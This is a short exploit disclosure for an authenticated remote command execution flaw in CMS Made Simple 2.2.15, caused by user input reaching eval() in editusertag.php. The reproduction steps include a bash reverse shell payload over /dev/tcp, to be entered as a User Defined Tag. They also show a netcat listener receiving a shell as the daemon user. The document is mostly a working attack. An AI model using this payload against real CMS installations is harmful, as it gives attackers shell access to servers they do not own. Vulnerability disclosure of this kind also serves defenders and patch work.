CMS Made Simple 2.2.15 Remote Command Execution

CMS Made Simple version 2.2.15 suffers from an authenticated remote command execution vulnerability.

MD5 | 492dc0161e142e4c459b5c1f250a6bb0

# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage:
# Software Link:
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info:

Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 53690
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Related Posts